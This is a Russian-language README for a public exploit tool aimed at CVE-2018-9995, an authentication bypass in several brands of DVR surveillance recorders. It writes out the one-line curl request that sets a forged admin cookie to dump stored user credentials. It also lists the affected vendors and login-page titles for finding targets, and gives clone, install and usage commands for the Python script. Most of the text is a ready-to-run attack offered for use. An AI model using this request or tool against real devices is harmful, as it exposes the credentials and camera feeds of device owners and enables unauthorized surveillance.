
Эксплойт-инструмент для CVE-2018-9995, который извлекает учётные данные DVR через специально сформированный HTTP-запрос, нацеленный на несколько производителей DVR для тестирования безопасности.
[*] Exploit Title: "Получает учетные данные DVR (Модификация)"
[*] CVE: CVE-2018-9995
[*] CVSS Базовый балл v3: 7.3 / 10
[*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
[*] Дата: 09/04/2018 Изменено 28/04/2024
[*] Автор эксплойта: Fernandez Ezequiel ( twitter:@capitan_alfa ) & batmoshka55

$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (название: "XVR Login")
Securus, - Безопасность. Никаких компромиссов !! -
Night OWL
DVR Login
HVR Login
MDVR Login



usr@pwn:~$ git clone https://github.com/batmoshka55/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]
[+] Получение раскрытых учетных данных
optional arguments:
-h, --help показать это справочное сообщение и выйти
-v, --version показать номер версии программы и выйти
--host HOST Хост
--port PORT Порт
[+] Демонстрация: python getDVR_Credentials.py --host 192.168.1.101 -p 81

Я вижу тебя... ! xd